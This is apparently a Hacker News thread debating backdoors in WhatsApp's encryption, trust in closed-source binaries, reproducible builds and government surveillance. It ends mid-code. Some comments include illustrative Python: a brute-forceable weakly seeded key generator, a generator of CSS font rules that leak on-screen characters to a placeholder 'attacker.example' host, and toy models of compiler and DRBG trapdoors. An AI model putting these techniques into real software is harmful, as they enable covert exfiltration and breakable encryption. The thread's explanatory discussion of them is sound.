We believe people have a fundamental right to have private conversations. End-to-end encryption protects that right for over a billion people every day.
We will always oppose government attempts to build backdoors, because they would weaken the security of everyone who uses WhatsApp, including governments themselves. In times like these we must stand up both for the security and the privacy of our users everywhere. We will continue to do so.
Will, Head of WhatsApp
My understanding is that they can prevent you from announcing that you have received a secret warrant, but they can't force you to keep announcing "I have not received a secret warrant".
In places where there are limits to what the government can do to and with you, it's possible to resist.
The US government can’t legally compel you to lie, but may restrict what you can say.
We know that the legal bar for forcing someone to speak or not speak is high (compelling state interest), but national security has usually been held to pass such a bar.
Warrant canaries are nice to have, but viewing them as something which provides proof of absence of government meddling is incorrect.
That wouldn’t even be illegal, since they never hit you with a wrench - you just imagined they were about to go xkcd on you
It reads like your product is already compatible with government eavesdropping.
You don't have to take our word on this -- I wouldn't want you to. As others on this thread have pointed out it's possible enough to tear through our binaries that if we did have a backdoor it would be discovered.
No, it's not "possible enough" and I strongly suspect you fully realize that.
A backdoor doesn't need to be in the form of an IF statement or something comparably obvious and silly. It can be a weakly seeded PRNG that would allow a "determined party" to brute-force the key exchange in a reasonable time. That would take man-years to fish out of a binary, and that's without considering that you may (be forced to) distribute an altered binary on demand and to specific targets only.
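To make that concrete, here's a toy Python sketch of the kind of weakness I mean. The construction and the tiny 20-bit seed are purely illustrative, not anything known about WhatsApp's code:

    # Toy illustration of a weakly seeded key generator (hypothetical, illustrative only).
    # If key material is derived from a small seed space, anyone who knows the scheme
    # can brute-force the seed and recover the key from outside.
    import hashlib
    import random

    SEED_BITS = 20  # kept tiny so the demo runs in seconds; real weak seeds
                    # (timestamps, PIDs) aren't much better against a determined party

    def weak_keygen(seed: int) -> bytes:
        rng = random.Random(seed)                        # deterministic, seedable PRNG
        material = rng.getrandbits(256).to_bytes(32, "big")
        return hashlib.sha256(material).digest()

    victim_key = weak_keygen(0x5A17C)                    # victim's "session key"

    # An observer who knows the construction simply tries every possible seed.
    recovered = next(s for s in range(2 ** SEED_BITS) if weak_keygen(s) == victim_key)
    print(hex(recovered), weak_keygen(recovered) == victim_key)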
So in the end all we have - realistically - is in fact just your word. There's no way for you to prove that you are trustworthy by pointing at some random binary. The only option is to distribute reproducible builds of audited open source.
Simple example: I'm sure the WhatsApp main window is a webview. Imagine that the application loads some kind of resource (e.g. CSS) from the WhatsApp server. The server can then serve slightly altered CSS that leaks secret data via custom fonts, etc., and you won't be able to find that unless you're intercepting all traffic and can decrypt it (and apps nowadays love to pin certificates).
This is an imaginary attack; I have no idea whether WhatsApp does that. But HTML is a powerful and dangerous beast, and it's used a lot in applications for rich media.
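For the curious, the trick would look roughly like this. The snippet below just generates the kind of stylesheet I'm describing; attacker.example is a placeholder, and again this is hypothetical, not something observed in WhatsApp:

    # Sketch of CSS exfiltration via per-character web fonts (hypothetical).
    # Each @font-face rule covers one character via unicode-range; the browser only
    # fetches a rule's src URL if that character is actually rendered, so the set of
    # requests arriving at the attacker's server leaks which characters appeared.
    EXFIL_HOST = "https://attacker.example"   # placeholder

    def leaky_css(chars: str, selector: str = ".secret") -> str:
        rules = []
        for ch in chars:
            cp = ord(ch)
            rules.append(
                "@font-face {\n"
                f"  font-family: leak-{cp:x};\n"
                f"  src: url('{EXFIL_HOST}/seen?cp={cp:x}');\n"
                f"  unicode-range: U+{cp:04X};\n"
                "}\n"
            )
        families = ", ".join(f"leak-{ord(c):x}" for c in chars)
        rules.append(f"{selector} {{ font-family: {families}, sans-serif; }}\n")
        return "".join(rules)

    print(leaky_css("0123456789"))   # e.g. leak which digits appear in a displayed code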
Signal has the same issue.
Active ways to attack the client to make it leak the key are far more worrying - but even an open source project wouldn't protect against that.
Good luck finding even this without a fine-tooth comb. And that's us just getting started with code-flow obfuscation.
No source = no trust. It's as simple as that.
Of course, if WhatsApp detects an abnormal or tampered version of the app, they can suspend or disable your account. I'm sure security labs that do reverse engineering of this sort do it on test handsets with burner numbers and identities, so it wouldn't affect any personal accounts they use.
That said, @wcathcart: in a community with deep technical expertise like Hacker News, folks do consider how many possible channels and means there are to covertly leak information from applications.
You're correct that in the general case it's likely that tech-savvy users would scan a popular app like yours and find any 'obviously-placed' backdoors. It's an observational and opportunistic approach, akin to the way a passer-by might spot a poorly locked bicycle on a street.
Unfortunately there's an extra level of complexity here - any app may have unusual behaviors that a sophisticated attacker could trigger for individual users to exploit them - and it's really, really hard for the security-conscious of us -- who might never see or meet those users -- to truly trust that your app is doing what you tell us it is, whether that's end-to-end encryption in all situations, or anything else.
The reason is that without being able to see how the app is written, verify that it's genuinely the same compiled version running on all devices, and audit the behavior it will have under exceptional circumstances -- external observers just don't know.
I'm not expecting you to make the source freely available, incredible though that would be - I'm just trying to explain the potential disconnect you might find in dialogue with some commenters.
That's explicitly against your terms of service.
Sometimes this leads to us being blocked. We were blocked in Brazil, for example, but that block was overturned in the courts.
It'd indeed be interesting to know if the FSB had some kind of baseband vulnerability that they'd used willy-nilly to facilitate dragnet surveillance.
I suspect William Binney was right though - blanket surveillance is just expensive and hides your needles in a mountain of hay; you really want high quality in the data you store in order to ease extraction of meaningful information / intelligence.
(that's not to say that aggregate meta data isn't interesting - just that with actual content noise is a problem)
Have you considered architectural changes that will allow for the app to be compiled and deployed by an affiliate corp outside of these jurisdictions?
So will WhatsApp refuse to comply, if this goes forward?
And is that even possible?
I do appreciate that Facebook has the resources to fight. To fight an NSL, even. But IANAL, and have no clue.
Any comment on this?
Platforms that rely on trust (in this case, trusting that FB isn't doing bad things) provide very weak guarantees about privacy/security. They could easily include a keylogger in WhatsApp and bypass the e2e encryption, for example, and us regular folk have no way of knowing.
Careful - you're right that WhatsApp is untrustworthy, but laws that force them to add backdoors could well be applied to open-source code as well. Or make possession of non-backdoored software, open or not, illegal. Or compel OS/hardware manufacturers on which the code runs. The law is a dangerous thing to ignore.
Implementing hardware backdoors that are opaque to end users is theoretically possible, but more difficult in practice. You could, for example, build a screen/monitor that just captures everything on the screen and forwards it to some other entity, but in practice it's not so easy because of bandwidth limitations, etc. I suppose it would be much easier to create a physical keyboard that phones home over a mobile network, although it would only give you half the conversation.
*edit: added the word "audited".
Where does that leave the rest of society? Having open source software and hardware is not enough, we also need laws that prohibit mass surveillance and support our efforts to uphold human rights.
Laws are probabilistic, whereas math and source code are deterministic. You can verify that computer code does what it says it does. Laws depend on enforcement and complicated judicial systems (based on humans) to interpret and apply them, which means they can effectively change over time, and the goalposts are never stationary.
This is why moving the goalposts and further normalizing surveillance is extremely dangerous. The rights that you enjoy today are not universal, and can obviously be eradicated in less than a generation.
There is no mathematical escape hatch from society. All we have is a messy assortment of technological mitigations that change the cost of surveillance.
These mitigations work best in combination with constitutional rights that limit what the government of the day can do, triggered by the latest outrage in the news.
This is clearly a straw man, no one wants to do this, or is suggesting that we do this. But at some point, even the most hardened OSS advocate has to trust someone (usually the hardware manufacturer). You cannot verify that the device you're on doesn't spy on you, you have to rely on the manufacturer's word that it doesn't. And the manufacturer's suppliers, of course, because the manufacturer is trusting them.
Somewhere along the stack, we all have to draw a line and say "beyond this point, I trust that I am not being spied on". You choose to draw that line at the hardware point. Others choose to draw the line at the software point.
Proper law enforcement (mind the "enforcement" part) can make a neighborhood safe enough that nobody tries to shoot you and you won't need to wear a vest. But at the end of the day, if you are messing with bad people in a bad neighborhood, bulletproof vests are real; laws are not.
And when you are talking about the government enforcing the laws that are supposed to forbid uncontrollable government agencies from doing what they do: well, the government kind of is the bad people in the bad neighborhood.
Not necessarily. Have you ever heard of Ken Thompson's backdoored C compiler?
>Re-write compiler code to contain 2 flaws:
>When compiling its own binary, the compiler must compile these flaws
>When compiling some other preselected code (login function) it must compile some arbitrary backdoor
>Thus, the compiler works normally - when it compiles a login script or similar, it can create a security backdoor, and when it compiles newer versions of itself in the future, it retains the previous flaws - and the flaws will only exist in the compiler binary so are extremely difficult to detect.
It's not necessarily a viable attack method today, but it's the lesson behind it that's important. Anything can be compromised.
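If it helps, here's a toy Python model of that self-propagation step. Obviously this isn't Thompson's actual code; "compilation" is reduced to string handling just to show the logic:

    # Toy model of the "trusting trust" attack. The trojaned compiler re-inserts its
    # own trojan whenever it compiles the (clean) compiler source, and plants a
    # backdoor whenever it compiles the login program -- so the published sources
    # never show anything suspicious.
    CLEAN_COMPILER_SRC = "compile(source) -> binary"     # stand-in for real source
    LOGIN_SRC = "check_password(user, pw)"

    def trojaned_compile(source: str) -> str:
        if source == CLEAN_COMPILER_SRC:
            # self-propagation: emit a compiler that behaves like this function
            return "BINARY[" + source + " + TROJAN]"
        if source == LOGIN_SRC:
            # payload: emit a login binary that also accepts a master password
            return "BINARY[" + source + " + BACKDOOR(master_pw)]"
        return "BINARY[" + source + "]"

    print(trojaned_compile(CLEAN_COMPILER_SRC))   # trojan survives recompilation
    print(trojaned_compile(LOGIN_SRC))            # backdoor appears in login
    print(trojaned_compile("harmless_app()"))     # everything else looks normal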
So you still just invest trust in the maintainer or — if you’re lucky — the third party auditing firm who was paid to review the code.
That you can review the code doesn’t mean that anyone does so. At least not in an exhaustive and relevant way.
Closed source or open, the problem is made even worse now that we live in a Package Manager culture where even the simplest applications adopt dozens of dependencies.
I’m not saying that you should trust Facebook and their closed source applications, just that you’re not really all that safer trusting anyone else just because their source code is available.
Correct use of past tense. In the present, e2e encryption is on by default.
> Does this new announcement really lessen the security and privacy of the users?
Yes it does, since e2e encryption is enabled by default now. Best I can tell, there’s no way to disable it either.
You assume that you actually understand the code well enough to identify the backdoor - e.g. as some sort of function that will bypass authentication when some secret hardwired password is provided (to give a dumb example).
However, to give a real-world example of backdoored crypto, it is nothing of the sort. For example, the issue with the potentially backdoored Dual_EC_DRBG pseudorandom number generator had been known since at least 2004 - but the algorithm was standardized by ISO/NIST and used for years, until the potential backdoor was widely publicized following the Snowden leaks and the standard was withdrawn.
Good luck finding something like that just by reading code, unless you are an expert in crypto and mathematics. If you were only auditing whether or not the code matches the published, supposedly correct, standard (or algorithm description), you would never find this. The backdoored code was working completely fine, exactly as intended. But the weak random number generator allowed an adversary with sufficient computing resources to break the encryption.
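A simplified analogue (deliberately not the elliptic-curve construction itself) shows why this class of flaw is so nasty: the generator below looks reasonable and produces good-looking output, yet whoever holds the trapdoor value D can recover the internal state from a single output and predict every "key" that follows. In the real Dual_EC_DRBG the trapdoor is believed infeasible to derive from the public constants; that is the one property this toy does not capture.

    # Simplified analogue of a trapdoored DRBG (NOT Dual_EC_DRBG; this toy uses
    # modular arithmetic so the idea fits in a few lines). The code is "correct"
    # and passes casual inspection, but whoever knows D can predict all output.
    P = 2_147_483_647                      # public modulus (a Mersenne prime)
    Q = 48_271                             # public multiplier used to produce output
    D = pow(Q, -1, P)                      # the trapdoor: Q * D == 1 (mod P)

    class ToyDRBG:
        def __init__(self, seed: int):
            self.state = seed % P
        def next_output(self) -> int:
            self.state = (self.state * 16_807) % P     # internal state update
            return (self.state * Q) % P                # published output

    # Victim uses the generator to derive "keys".
    rng = ToyDRBG(seed=123_456_789)
    first = rng.next_output()
    later_keys = [rng.next_output() for _ in range(3)]

    # Attacker holding D recovers the state from the first output alone.
    predictor = ToyDRBG(seed=0)
    predictor.state = (first * D) % P
    predicted = [predictor.next_output() for _ in range(3)]
    print(predicted == later_keys)    # True: all future "keys" are predictable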
An improvement in security and privacy isn't limited to "make it impossible, even theoretically, for anything bad to ever happen OR you've accomplished nothing". Most back doors aren't inserted by competent NSA-level actors 20 years in advance. Most are "whenever a message passes through, send a copy to this third party". They are inserted by court order when the government becomes interested late in the game because of a specific case. For example, when terrorists start using some secure email service, the government tries to force the service to allow them to snoop on the relevant conversations. Open sourcing the code would allow you (with the help of the community) to detect these sorts of attempts when the product involves end-to-end encryption.
So while having the source and a community auditing changes to that source doesn't prevent every possible attack against your privacy, it prevents almost every one that is plausibly detectable, which is literally as good as you can do.
It's one of the reasons the Debian project has worked so hard at reproducible builds: https://wiki.debian.org/ReproducibleBuilds/About
Bugs can certainly occur (like Heartbleed etc) but the alternative (closed source opaque binary blobs) is much worse.
Now, to avoid the "Reflections On Trusting Trust" exploit, building the C compiler toolchain from known-good "root" compiler/linker toolchains, and then comparing the output vs. self-compilation is quite a bit harder.
Also, I'm still using one of those original builds on my laptop - upgraded of course...still mad love for my daily driver.
And so they never learned, and so they "can't".
In the same way, I can't use Gentoo or vim or compile either or ski or... :D
If you have multiple compilers and they all aren't infected in exactly the same way (e.g. one is not infected, or they have different types of infections) then you can detect there's a problem with them.
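That's the idea behind David A. Wheeler's diverse double-compiling. A rough sketch of the comparison logic, with toolchains modeled as plain Python functions rather than real compilers:

    # Sketch of the comparison idea behind "diverse double-compiling": build the
    # compiler's source with two unrelated toolchains, then use each result to
    # compile that same source again. If the source is honest and neither toolchain
    # miscompiles, the second-stage outputs agree; a mismatch flags an infection.
    # "Compilers" are modeled as functions here -- this shows the logic, not a real build.
    import hashlib

    COMPILER_SRC = "COMPILER: map source text to a binary, deterministically"

    def honest_semantics(src: str) -> bytes:
        # what the compiler *source* says compilation should produce
        return hashlib.sha256(src.encode()).digest()

    def clean_toolchain(src: str):
        # a clean toolchain emits a binary that faithfully implements the source
        return honest_semantics

    def infected_toolchain(src: str):
        # an infected toolchain silently emits a binary with extra behavior
        def trojaned(src2: str) -> bytes:
            out = honest_semantics(src2)
            return b"TROJAN" + out if src2 == COMPILER_SRC else out
        return trojaned

    def ddc_check(toolchain_a, toolchain_b) -> bool:
        stage1_a = toolchain_a(COMPILER_SRC)   # compiler binary produced by toolchain A
        stage1_b = toolchain_b(COMPILER_SRC)   # compiler binary produced by toolchain B
        stage2_a = stage1_a(COMPILER_SRC)      # that binary compiling the source again
        stage2_b = stage1_b(COMPILER_SRC)
        return stage2_a == stage2_b            # equal only if neither inserted anything

    print(ddc_check(clean_toolchain, clean_toolchain))      # True
    print(ddc_check(clean_toolchain, infected_toolchain))   # False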
JS is an easy target. What about C or C++? You could audit the code but have you also audited your compiler? What if you used Visual Studio?
Code is an easy target. Can you trust the auditors themselves and in the absence of that, your own ability to detect a vulnerability?
The only bulletproof solution is to not use software.
That said, most of us are not as important or recognisable as we believe we are. The layperson won’t have a good reason to isolate their computer and install an airlock between their aluminium-lined office and the rest of their house.
This is just an updated version of the story about the US government scanning your emails for keywords after 9/11. They don't even need to actually do it; they just need to say they do, and most people will self-censor their communications.
Many people can compile code from source. Not so many people have the ability to audit code for obscured backdoors. The number of people who are capable of auditing and also have the time necessary to do it is practically nil.
You could also decompile the Whatsapp APK and do the same thing (it's Java after all).
Look no further than the OpenSSL Heartbleed vulnerability
That assumes you can get the code. If it's illegal to distribute non-backdoored software, the code might be hard to get, for example Github might be forced to take it down.
Hacking into closed source code is much more dangerous (politically) for them and also more difficult.
There's currently a push for reproducible builds which further hardens distros against such attacks.
The fly in the ointment is that the client might have additional functionality to leak the e2e encryption key. That is far harder to find, but if its use were widespread, it would be found by researchers.
The whole point is moot though - WhatsApp is designed to (by default) upload cleartext chat logs to Google/Apple servers. Since all chats have 2+ recipients, the conversation is only safe from snooping if nobody in the chat has backup enabled, which is unlikely.
They could indeed serve you a different binary from the app-store. "Do you think that's Whatsapp you're using?"
I have much more trust in the former than the latter.
Audits should start with the actual binary. Only if you can ensure that the binary was built from a specific source tree and does not contain any other logic (i.e. it was built by a trusted compiler) can you happily skip the decompilation process and analyze that source instead.
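With reproducible builds the check itself is almost trivial; the hard part is making the build deterministic in the first place. A minimal sketch, with placeholder file paths:

    # Minimal sketch of verifying a reproducible build: if the build is deterministic,
    # an independent rebuild from the published source should be byte-identical to the
    # shipped binary, so comparing digests is sufficient. Paths are placeholders.
    import hashlib

    def sha256_of(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    def verify(shipped: str, rebuilt: str) -> bool:
        return sha256_of(shipped) == sha256_of(rebuilt)

    # e.g. verify("dist/app-official.apk", "dist/app-rebuilt.apk")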
It's still nice to see this spelled out since I've seen many people claim that WhatsApp being closed source is not that problematic. This is definitive confirmation that it cannot be trusted anymore and it's time to start working on the problem (both from a legislative point and by seeking out and moving to technological alternatives).
Back in the day, it was illegal to export "good" encryption. There was nothing stopping it from happening technically, just like there is nothing stopping you from stealing from a convenience store, except for the threat of enforcement.
But the threat of enforcement can have a strong chilling effect.
I suspect most people want to keep their $500k+/year jobs instead of sticking their necks out. My friends who work at FAANG are largely mentally checked out, and just do it to collect their monies and retire ASAP. You can't pay rent with good feelings.
So just keep making the world shittier. Gotta love individualist capitalism.
Raised the standard of living for billions.
If you define the free market as nothing other than anarchy, then yes the free market is rare indeed.
But I don't know anyone that speaks in such absolutes.
No one quote in particular; just a recurring theme.
"It is not from the benevolence of the butcher, the brewer, or the baker, that we expect our dinner, but from their regard to their own interest"
- The Wealth of Nations
"The natural effort of every individual to better his own condition...is so powerful, that it is alone, and without any assistance, not only capable of carrying on the society to wealth and prosperity, but of surmounting a hundred impertinent obstructions with which the folly of human laws too often encumbers its operations."
"The statesman who should attempt to direct private people in what manner they ought to employ their capitals, would...assume an authority which could safely be trusted, not only to no single person, but to no council or senate whatever"
"In spite of their natural selfishness and rapacity [capitalists] are led by an invisible hand...and thus without intending it, without knowing it, advance the interest of society"
- The Theory of Moral Sentiments
> Have you read him?
"The man of the most perfect virtue, the man whom we naturally love and revere the most, is he who joins, to the most perfect command of his own original and selfish feelings, the most exquisite sensibility both to the original and sympathetic feelings of others."
Self-interest, yes, but in a system regulated just as much by the church and the aristocracy as by the flow of capital. Pure monetary greed without regard for doing what is right is nothing Smith would ever have advocated.
Imagine if 10 or 20 different organizations all had access to the source code and could vouch for the checksum of each build.
While it would be nice if we could trust FB, Apple, etc., it would be much better if we didn't have to, and could simply trust others who have less to lose from alienating government officials.
This would be quickly detected by anyone looking at the data the WhatsApp app was sending back to the server (this isn't hard to do on a jailbroken device).
Don't hate the politicians who keep pushing this. They're just trying not to get fired. And the surest way to get fired in a western country right now is to be seen doing nothing about the terrorism problem and then having terrorist acts committed under your watch. So the politician asks the security forces "what can we do to stop terrorism?" Security says "get us access to messages of terrorism suspects". Seems reasonable, let's go ahead with it.
Yes, we know that it doesn't stop with terrorism suspects. Then law enforcement wants to read the messages of drug kingpins, then drug suspects, then shoplifters, then jaywalkers, then everyone, just to be on the safe side.
But as long as people are told that they need to give up some privacy in exchange for security, they'll take the latter every time.
Don’t hate the politician for trying to keep their job. In that respect they’re no different from any other person.
Yes, if you can convince politicians that you’re more concerned about the actual damage to your privacy than the hypothetical increase in the probability of a terrorist attack, then go ahead. Do it. Convince them. But my hunch is that most people are far more terrified of dying in a terrorist attack.
If your conversations aren't encrypted and I have access to them, and people know this, then if I claim that you said a certain something in such a conversation, people are more likely to just believe me.
Also, unencrypted data is data that can be altered by a third party.
I also have nothing to hide :-)
- What are the things you and your significant other are doing in the privacy of your house?
- Which co-worker do you fantasize about? Be specific about what you would like to do.
- As a teenager, what legal/illegal drugs did you consume? How often did you pass out, and who were the people you consumed these drugs with?
- What are your political leanings?
- How much do you earn, and where are your savings invested?
- Which illnesses do you currently have, and which exist in your social circle?
- What private information was shared with you by other parties? Are you aware of any wrongdoing/illegal activity by other people? Be specific, esp. friends and family.
Be aware that I will share this information with anyone in your social group/work/volunteering work whenever I feel like it. I may also share this data with extremist groups on the other side of the spectrum, if helpful. Lastly, I can use this data to fabricate "helpful" information about you if necessary. Thank you.
Edit: upvoted you. Asking the question of if and when this happened is important for future generations.
That's not your decision to make, as to whether you have something to hide or not. That will be decided by someone else. It's entirely out of your hands and - depending on where and when you are subject to such scrutiny - may be arbitrarily decided, which is in fact a requirement in all authoritarian systems (the law has to be heavily subjective and arbitrarily enforced so it can be directed against anyone at anytime as so required, such that the population is kept in constant fear).
This sounds as if the platforms are already sharing with the US authorities. So this is about them now sharing it with UK authorities as well.
Similarly the UK has had its spying ruled unlawful under ECHR: https://www.theguardian.com/uk-news/2018/sep/13/gchq-data-co... (perhaps this is why Richard Dearlove, "C" of MI6, is so Brexity)
"Encrypted" could mean that's how they'll be delivered to the UK.
Or it could be a definition of the set of which messages are in question. The set is defined as the ones that users expected were supposed to be protected by encryption (or that government could not access because of encryption).
In other words, from the phrasing alone, it's not clear whether "encrypted" describes the state of the messages or the scope of the sharing.
Whether anyone is actually doing that is another question. And there is no technical reason app stores couldn't send a special backdoor-ed build to select list of users under surveillance if government forced them to. (They can target sets of users for staged roll-outs, beta programs, etc.) Which defeats the notion that one person watching can detect it for everybody.
On the other hand, it's possible to do stuff with smart phones at the platform level. Whether through vulnerabilities or some platform capability (updates, etc.), it may be possible to have a backdoor-ed binary that looks to the user like it is the regular binary. That's not a capability that Signal has, but it is a capability that might very well exist.
Regardless of all that, for users who have auto-updates enabled (most users), even if Signal can't silently push a backdoor-ed update, they can unilaterally push one. You could wake up tomorrow with a different version that has a backdoor, so even if you can identify backdoor-ed binaries, you have to turn off updates or verify the binary every time you open the app.
When you install an app (whether through an app store, or side-loading) the app should state the location online of an append-only log that lists all the releases (with timestamps) for that app. The phone OS could periodically check to see if an upgrade is available, and security researchers could check that the log doesn't contain references to versions which aren't available to the public.
Ideally there should perhaps also be a way for users to anonymously report which version of any app they are using, so that people with particular security concerns could configure their OS to only update an app after, for example, 50% of users have already installed the update.
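Something like a binary-transparency log, in other words. A rough sketch of the append-only structure (this is a proposal, not an existing app-store feature):

    # Sketch of the append-only release log proposed above. Each entry commits to the
    # previous one, so a publisher cannot quietly rewrite history; researchers can look
    # for versions that appear in the log but were never offered to the general public.
    import hashlib
    import json
    import time

    def entry_hash(entry: dict) -> str:
        return hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()

    class ReleaseLog:
        def __init__(self):
            self.entries = []

        def append(self, version: str, artifact_sha256: str) -> dict:
            prev = entry_hash(self.entries[-1]) if self.entries else "0" * 64
            entry = {"version": version, "artifact_sha256": artifact_sha256,
                     "timestamp": int(time.time()), "prev": prev}
            self.entries.append(entry)
            return entry

        def verify_chain(self) -> bool:
            prev = "0" * 64
            for e in self.entries:
                if e["prev"] != prev:
                    return False
                prev = entry_hash(e)
            return True

    log = ReleaseLog()
    log.append("2.19.250", "ab" * 32)        # placeholder artifact digests
    log.append("2.19.251", "cd" * 32)
    print(log.verify_chain())                # True; any retroactive edit breaks the chain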
I agree with that analysis, but it's not clear to me why we don't have similar levels of skepticism about auto-updating desktop apps. Signal in particular uses a third-party software repository, so if it wanted to push a malicious update, it wouldn't even need to sneak it past package maintainers.
Package signing protects you against developers with bad personal security practices, because it makes it harder for a third-party to MITM their apps. But it doesn't do anything I can see to protect you from a developer that turns malicious in the future.
Telegram is subject to US coercion as much as any US company: both major app stores are US-based, and without app store distribution, a product might as well be dead as far as the masses are concerned.
I would, except it requires a mobile phone number.
From the article:
Priti Patel, the U.K.’s home secretary, has previously warned that Facebook’s plan to enable users to send end-to-end encrypted messages would benefit criminals, and called on social media firms to develop “back doors” to give intelligence agencies access to their messaging platforms.
That's the UK's position but it's not clear from the article that some kind of forced backdoor made it into the treaty, just that WhatsApp will be forced to share users’ encrypted messages. But they have already been sharing encrypted messages through other legal means.
More speculation here: https://www.justsecurity.org/24145/u-s-u-k-data-sharing-trea...
Why comment if you didn't read the article? It's in the first paragraph: "Social media platforms based in the U.S. including Facebook and WhatsApp will be forced to share users’ encrypted messages with British police under a new treaty"
(The headline on Bloomberg, "Facebook, WhatsApp Will Have to Share Messages With U.K. Police" is more restrained.)
And it's worrying that a large number of readers' interpretations of the article were influenced by a headline. We really have to do better and be vigilantly aware of how media and power influence public opinion, especially during times such as these.
...that are US-based. You may want to check out Threema for a valid WhatsApp replacement.
>WhatsApp has no ability to see the content of messages or listen to calls on WhatsApp. That’s because the encryption and decryption of messages sent on WhatsApp occurs entirely on your device. Before a message ever leaves your device, it's secured with a cryptographic lock, and only the recipient has the keys.[...]
>A search warrant issued under the procedures described in the Federal Rules of Criminal Procedure or equivalent state warrant procedures upon a showing of probable cause is required to compel the disclosure of the stored contents of any account, which may include "about" information, profile photos, group information and address book, if available. In the ordinary course of providing our service, WhatsApp does not store messages once they are delivered or transaction logs of such delivered messages, and undelivered messages are deleted from our servers after 30 days. WhatsApp offers end-to-end encryption for our services, which is always activated
Very interested to see what their response is and if their promise holds that they do not have technical access to content but merely to account information.
Even if FB / WhatsApp doesn't currently have such a capability, there's no legal guarantee they couldn't be compelled to add it, thereby putting them in conflict with language that didn't include that clause.
Afaik, case law is murky over whether creating new code qualifies as speech (illegal to compel) or facilitating legally-approved wiretapping (legal and required).
More interesting is what happens if someone gets a new phone. In that case (if I understood correctly) they might ask for the sender to resend the messages with a different key. If they really are forced to add a backdoor then that's where I would fit in a MITM attack, as it is limited in scale and detectable when used excessively.
Pretending and using obfuscated language to lead the reader to believe otherwise is disingenuous.
I truly fear for the future that western governments, in particular the Five Eyes members, are hell-bent on creating. They denounce China and Russia for their human rights records in one breath, and seek to strip us of privacy and personal rights in the next - the hypocrisy is simply staggering.
What's perhaps even more frightening is that so many people believe that moves like this are to keep us safe, will keep us safe.
This can not end well...
The 2019 heat was directly implicated in the deaths of at least 15 people. Five died in France, four in Germany, three in the United Kingdom, two in Spain, and one in Italy. Nine of these were drownings, attributed to people cooling down, and another involved an exhausted farm worker who went unconscious after diving into a pool. The three who died in hot air were aged 72, 80 and 93. Approximately 321 million people were otherwise affected by similar temperatures in the same countries.
Edited for clarity
> Netherlands reported 400 excess deaths in the week of the heat wave, a figure comparable to those recorded during the 2006 European heat wave.
The Netherlands is considerably smaller than the other nations. Most analyses treat these spikes as partly* people who would have died in the following days, weeks, or months anyway (lowering the statistics later in the year), and partly people who would not have.
A paper putting the 2003 heat-wave death toll at 70,000:
*The term from the 2003 paper is "harvesting", and there were little to no signs of it.
That is not correct, whoever wrote it. Just do a Google search: heatwave 2019 total deaths.
CNN already reports 1,500 deaths in France alone. This is a link to a news site with a higher estimate, although I of course cannot verify the correctness of the source: https://www.vox.com/world/2019/6/26/18744518/heat-wave-2019-...
Backdooring a communication is only done to safeguard a government's power under the pretense of security.
Further away from democracy, leaders are purely self serving, successful corruption is seen as a sign of intelligence and whistle-blowers, far from being heroes for pointing out maleficence, are threatened with execution.
And indeed, institutions eventually shift to working solely for the benefit of themselves and the people in charge. Mostly because any that don't are undermined until they do.
I had this thought yesterday as I read about several prominent politicians in Canada, including the prime minister, actively participating in the climate 'protests' that occurred yesterday. Who were they out there protesting? Themselves? They're the ones with the power to change things. Why were they outside with signs instead of in their offices doing something about it?
Those 20 senators (from Alaska, Missouri, Arkansas) are answerable to the demands of their constituents. Those people are not asking for Climate Change Policies. It has nothing to do with money, but the values and culture of the constituents.
It is incredible how HN and the majority of the supposedly 'smart' crowd completely fail to understand the dynamics of how policies and laws are passed or made in this country or anywhere else.
It is also incredibly stupid to paint all politicians with the same brush, because if you are an immoral, evil politician you'd exactly want that situation. "All politicians are the same", "All media is the same" is the foundational strategy of bad actors.
Also, so what if the bad actors want us to believe that all politicians are the same? What if it were true that they're all the same and evil? Would it still be "incredibly stupid" to accurately assess the state of affairs?
See for example: https://www.theguardian.com/society/2018/nov/30/excess-winte...
I think it is. The problem is, denying us access to safe communication is not going to make us more safe, but less.
I don't think it is quite as simple as this (I'll preface this by saying I don't think we should have backdoors, and that I wish we had STRONG encryption everywhere). I think the problem is that different departments have different goals. It is very clear that the CIA's and NSA's jobs would be easier if there were a magical tool that let them, and no one else, backdoor in. The police and FBI would have an easier time doing their jobs if encryption wasn't a thing. That's definitely true! The issue is: who is watching the watchmen? That's why we need checks and balances (specifically by people who understand the tech).

These departments are so focused on their goals that they lose track of the fact that introducing backdoors actually creates more work for them (and thus actually makes their lives harder). But as humans we're always focused more on the task at hand and less on the overarching tasks (we're notoriously bad at dealing with large-scale, multifaceted problems). It all really comes down to these departments thinking "if we had this tool it would be possible that we could have stopped this" - and "possible" is the key word, because we've seen that they can't. There's just too much data. You're just adding more hay to the haystack.

The failure really is at the checks-and-balances stage: those watching the watchmen don't understand the motivations or the consequences, and thus let them do as they please. Agencies running the checks and balances are supposed to be suspicious and critical, not friendly. But those agencies aren't getting the funding, nor can they attract people who are tech literate, so there's a feedback loop that is only getting stronger. What I'm trying to say is that there's a long chain, things are broken at many stages, and fixing any single stage would bring significant improvement, because it would help stop the feedback loop.
tldr: The intelligence agencies should be smart enough that they would know that backdoors will backfire on them. But they clearly aren't. There's also a huge failure at the checks and balances stage where these agencies are getting approval which creates a feedback loop and without solving this the problem will continue to grow.
There are ZERO people from the pitchfork community who understand the pressure of working to keep a community, region or country safe. If there is a terrorist attack, the pitchfork people have to answer ZERO questions, while the CIA/NSA/police will have to answer "Why didn't you do something?"
It is so easy to sit in their comfortable offices and homes and philosophize about privacy when you have no skin in the game.
> It is so easy to sit in their comfortable offices and homes and philosophize about privacy when you have no skin in the game.
And I definitely agree with this. But that's also why I made a big point of the fact that a lack of encryption actually gives these agencies more work (if we look at history). The problem is exactly what you note though: there will always be failures, and we ask why they couldn't stop things that are nearly impossible to stop. Post hoc analysis is always easier than in situ.
“One who is elected by the common populace to facilitate business at the cost of logical reasoning, human rights and the natural world.”?
While I’m sure one or two exist, I can’t actually think of a politician in the US, UK or Australia who doesn’t fit into the definition somehow. Again, there would be a few good ones, just not enough.
Back in the '90s I used a nym e-mail address to receive e-mails anonymously and without leaving traces.
In a few words - e-mails are encrypted with your PGP key and posted to Usenet groups, where you scan all messages and extract only those signed&encrypted with your key.
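The retrieval side is what makes it hard to trace: every reader downloads everything and only keeps what decrypts with their key, so the newsgroup learns nothing about who a message was for. Roughly like this, with the PGP and NNTP parts left as placeholders rather than real APIs:

    # Sketch of the retrieval step described above. try_decrypt() stands in for a real
    # PGP binding (e.g. shelling out to gpg); fetch_all_messages() stands in for an
    # NNTP client pulling the whole newsgroup. Both are placeholders.

    def fetch_all_messages():
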